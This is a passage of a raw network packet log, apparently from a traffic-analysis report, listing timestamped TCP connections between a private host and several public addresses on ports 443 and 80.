                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.156907082 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.156971931 CET49952443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.157136917 CET49952443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.157151937 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.234513998 CET49680443192.168.2.1720.189.173.13
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.250536919 CET4968280192.168.2.17192.229.211.108
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.251813889 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.252129078 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.252137899 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.252676964 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.253071070 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.253139019 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.253230095 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.280366898 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.280591011 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.280611038 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.282938957 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.283003092 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.283298969 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.283373117 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.283435106 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.283442020 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.295341015 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.314445019 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.314692974 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.314718008 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.316155910 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.316230059 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.316515923 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.316596985 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.316668034 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.316680908 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.329624891 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.361541033 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.400336027 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.400563955 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.400578022 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.401577950 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.401638031 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.401917934 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.401976109 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.402046919 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.402054071 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.456528902 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.472292900 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.472351074 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.472404957 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.473062038 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.473076105 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.507308006 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.507352114 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.507368088 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.507421970 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.507448912 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.507493973 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.515434980 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.515490055 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.515511036 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.515537024 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.515553951 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.515583992 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.597352982 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.635987043 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.636051893 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.636085987 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.636102915 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.636116028 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.636147022 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.640412092 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.640691996 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.640707970 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.641043901 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.641370058 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.641442060 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.641508102 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642486095 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642532110 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642596006 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642596006 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642606974 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642729044 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642745018 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642766953 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642818928 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642956018 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.642966986 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.643651962 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.643888950 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.643899918 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.644874096 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.644937038 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.645253897 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.645314932 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.645451069 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.645458937 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.648514986 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.648545980 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.648782015 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.648861885 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.648912907 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.650502920 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.650567055 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.650612116 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.651047945 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.651065111 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.651411057 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.651621103 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.651648045 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.652731895 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.652759075 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.652825117 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.653090954 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.653152943 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.653286934 CET49954443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.653297901 CET44349954172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.653667927 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.653749943 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.653902054 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.653915882 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.664729118 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.665000916 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.665019989 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.666454077 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.666538000 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.666832924 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.666914940 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.667257071 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.667263031 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.687331915 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.696630001 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.696630001 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.713329077 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.881443024 CET443499433.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.881828070 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.881850958 CET443499433.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.882961988 CET443499433.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.883635044 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.883776903 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.883809090 CET443499433.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.890907049 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.890974998 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.891160011 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.891545057 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.891545057 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.891565084 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.891843081 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.894491911 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.894519091 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.894582987 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.894887924 CET49957443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.894901991 CET44349957157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.930855036 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.930907965 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.930974960 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.931097031 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.931134939 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.931190014 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.932125092 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.932178020 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.932240009 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.933527946 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.935036898 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.935094118 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.935389996 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.935404062 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.935606956 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.935667992 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.935673952 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.936592102 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.936638117 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.936789036 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.938746929 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.938782930 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.938888073 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.939104080 CET49958443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.939117908 CET44349958157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.980110884 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.980187893 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.980197906 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.980215073 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.980247974 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.980690002 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.980726957 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.010739088 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.010762930 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.010880947 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.011034966 CET49959443192.168.2.173.219.22.30
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.011043072 CET443499593.219.22.30192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.026293039 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.026506901 CET49952443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.026535034 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.027784109 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.027844906 CET49952443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.028141975 CET49952443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.028238058 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.028326035 CET49952443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.028333902 CET4434995291.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.076520920 CET49952443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.099498987 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.099518061 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.099545002 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.099586010 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.099612951 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.099631071 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.103982925 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.104038000 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.104048014 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.111536026 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.111603975 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.111610889 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.124634981 CET443499433.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.124805927 CET443499433.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.124954939 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.125350952 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.125366926 CET443499433.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.125376940 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.125416040 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.126224041 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.126256943 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.126329899 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.126545906 CET49960443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.126570940 CET443499603.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.155637980 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.187712908 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.187982082 CET49949443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.188004017 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.189121008 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.189436913 CET49949443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.189616919 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.189623117 CET49949443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.189726114 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.194025040 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.194212914 CET49948443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.194245100 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.194586992 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.194860935 CET49948443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.194924116 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.194962025 CET49948443192.168.2.1754.75.69.192
